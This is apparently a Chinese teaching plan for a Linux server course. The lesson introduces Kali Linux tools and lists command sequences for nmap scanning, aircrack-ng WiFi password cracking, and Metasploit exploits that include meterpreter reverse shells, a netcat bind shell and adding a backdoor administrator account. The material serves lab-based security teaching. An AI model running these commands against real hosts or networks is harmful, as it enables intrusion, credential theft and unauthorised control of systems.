《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第1頁
《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第2頁
《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第3頁
《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第4頁
全文預(yù)覽已結(jié)束

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

教案授課章節(jié)任務(wù)十五:KALI操作系統(tǒng)的配置和使用(4課時)教學(xué)目標(biāo)1.KALI服務(wù)器的安全工具使用2.掌握KALI服務(wù)器的安全工具使用教學(xué)內(nèi)容1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測工具攻擊windowsXP、windows20034.使用安全漏洞檢測工具攻擊LINUX、windows7重點(diǎn)難點(diǎn)1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測工具攻擊windowsXP攻擊windows20034.使用安全漏洞檢測工具攻擊LINUX靶機(jī)攻擊windows7教學(xué)方法1.采用“項(xiàng)目引導(dǎo)”、“任務(wù)驅(qū)動”教學(xué)方法,并以實(shí)踐操作演示進(jìn)行講解。2.在課堂上注意講、學(xué)、做相結(jié)合,注重“問題引導(dǎo)”學(xué)生互動,充分調(diào)動學(xué)生的積極性,培養(yǎng)學(xué)習(xí)興趣、分析問題和解決問題的能力以及自學(xué)能力。課前準(zhǔn)備教學(xué)環(huán)境準(zhǔn)備:1.“教、學(xué)、做”一體化學(xué)生機(jī)房,教師機(jī)需要連接投影儀或者安裝同屏教學(xué)軟件;2.學(xué)生一人一機(jī)、可將學(xué)生每4-6人分為一組;3.機(jī)房電腦操作系統(tǒng)安裝好VMWareWorkstation14.0、需要CentOS7.4鏡像。學(xué)生預(yù)習(xí)要求:1.閱讀紙質(zhì)教材,查閱與本章節(jié)相關(guān)資料;2.在教學(xué)平臺上學(xué)習(xí)教材電子版和課件。教學(xué)過程師生活動:一、復(fù)習(xí)提問1.如何檢查服務(wù)器的系統(tǒng)基本信息2.如何文件及目錄權(quán)限、進(jìn)程管理二、導(dǎo)入新課1.無線網(wǎng)絡(luò)檢測:無線網(wǎng)絡(luò)不需要受到網(wǎng)線接入的位置限制,操作起來方便快捷,但是其所存在的安全問題也日益突出,已經(jīng)威脅到無線網(wǎng)絡(luò)的正常運(yùn)行。存在的主要安全問題有:無線網(wǎng)絡(luò)盜用、竊聽網(wǎng)絡(luò)通信、釣魚攻擊無線網(wǎng)絡(luò)、控制用戶的無線AP等。無線網(wǎng)絡(luò)安全問題的應(yīng)對措施有:限制無線網(wǎng)絡(luò)的接入、隱藏SSID、選擇合適的安全標(biāo)準(zhǔn)、修改無線路由器的密碼、降低無線AP的功率等。2.滲透測試軟件檢測操作系統(tǒng)安全三、講授新課1.任務(wù)描述:某單位在網(wǎng)絡(luò)安全檢查中,需要使用KALI操作系統(tǒng),用于網(wǎng)絡(luò)安全檢測及調(diào)查取證。系統(tǒng)管理員在使用KALI過程中,需要使用安全漏洞檢測工具以及無線安全工具檢驗(yàn)密碼強(qiáng)度及系統(tǒng)的強(qiáng)壯性。2.決策指導(dǎo):KaliLinux預(yù)裝了許多滲透測試軟件,包括nmap、Wireshark、JohntheRipper,以及Aircrack-ng等。用戶可通過硬盤、liveCD或liveUSB方式來運(yùn)行。它既有32位和64位的鏡像,用于x86指令集。又有基于ARM架構(gòu)、樹莓派和三星的ARMChromebook的鏡像。集成超過300個滲透測試軟件,給用戶提供了大量的安全工具。3.安裝配置命令知識要點(diǎn)1.學(xué)習(xí)NMAP安全工具nmap-sS-p1-65535-vnmap-p80--script=http-enum.nse2.學(xué)習(xí)aircrack安全工具破解wifi密碼airmon-ngstartwlan0airodump-ngwlan0monairodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0monaireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0monairmon-ngstopwlan0monaircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap3.學(xué)習(xí)安全漏洞檢測工具攻擊windowsXP、windows2003Msfconfsolenmap--script=smb-check-vulns--script-args=unsafe=1useexploit/windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpshowoptionssetRHOST6setLHOST37exploitnetuserhacker123456/addnetlocalgroupadministratorhacker/add4.使用安全漏洞檢測工具攻擊LINUX、windows7searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploituseexploit/windows/browser/ms10_046_shortcut_icon_dllloader4.任務(wù)實(shí)施過程一:學(xué)習(xí)NMAP安全工具5.任務(wù)實(shí)施過程二:學(xué)習(xí)aircrack安全工具破解wifi密碼6.任務(wù)實(shí)施過程三:學(xué)習(xí)安全漏洞檢測工具、攻擊windowsXP攻擊windows20037.任務(wù)實(shí)施過程四:使用安全漏洞檢測工具、攻擊LINUX靶機(jī)攻擊windows78.Nmap常用參數(shù)參數(shù)說明-sPping掃描,Nmap在掃描端口時,默認(rèn)都會使用ping掃描-sL簡單列表掃描-sn使用PING主機(jī)方式-sV監(jiān)測端口服務(wù)版本操作系統(tǒng)信息主機(jī)名等-sS半開掃描-sTTCP方式掃描,會在目標(biāo)主機(jī)的日志中記錄大批連接請求和錯誤信息。-sUUDP掃描,UDP掃描是不可靠的-sA這項(xiàng)高級的掃描方法通常用來穿過防火墻的規(guī)則集-sF-sN秘密FIN數(shù)據(jù)包掃描、XmasTree、Null掃描模式-sC腳本掃描-A全面系統(tǒng)檢測、啟用腳本檢測、掃描等-O啟用遠(yuǎn)程操作系統(tǒng)檢測,但可能存在誤報(bào)-V-v-v顯示掃描過程,推薦使用-PN掃描之前不使用ping命令-p指定端口,如“1-65535、1433、135、22、80、3389”等-h幫助文檔-T4針對TCP端口禁止動態(tài)掃描延遲超過10ms設(shè)置時間模板-iL讀取主機(jī)列表,“-iLD:\iplist.txt”-oN-oX-oG將報(bào)告寫入文件,分別是正常、XML、grepable三種格式-traceroute路由跟蹤掃描--script按照腳本分類進(jìn)行掃描-6開啟IPv6掃描9.本小節(jié)用到的命令。useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37四、課堂練習(xí)1.開啟SSH學(xué)習(xí)crunch密碼工具2.學(xué)習(xí)aircrack安全工具3.使用NMAP工具4.學(xué)習(xí)aircrack安全工具5.破解wifi密碼6.學(xué)習(xí)安全漏洞檢測工具7.攻擊windowsXP攻擊windows20038.攻擊LINUX靶機(jī)攻擊windows7學(xué)生活動:觀看教師演示、邊學(xué)邊做、思考、討論、完成任務(wù)實(shí)踐五、課堂小結(jié)1.總結(jié)本課學(xué)習(xí)內(nèi)容2.總結(jié)、評價(jià)學(xué)生小組活動情況二次備課布置作業(yè)1.完成課后鞏固練習(xí)題;2.上交書面作業(yè)或者在教學(xué)平臺上完成電子文檔上傳;3.觀看下一任務(wù)的微課或者項(xiàng)目實(shí)錄視頻。板書設(shè)計(jì)1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測工具攻擊windowsXP、windows20034.使用安全漏洞檢測工具攻擊LINUX、windows7教后反思通過學(xué)生互動活動,有利于學(xué)生自主學(xué)習(xí)與合作交流。一能加深對識別法的認(rèn)識,有助對教學(xué)內(nèi)容的鞏固;二利用這一互動活動,及時反饋信息,有利于教師調(diào)整教學(xué)策略,優(yōu)化教學(xué)方法,提高教學(xué)質(zhì)量。學(xué)生完成教學(xué)任務(wù)評價(jià)表評價(jià)指標(biāo)及評價(jià)內(nèi)容★★★★★★評價(jià)方式基本操作20分部署KALI操作系統(tǒng)教師評價(jià)開啟SSH學(xué)習(xí)crunch密碼工具動手做20

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論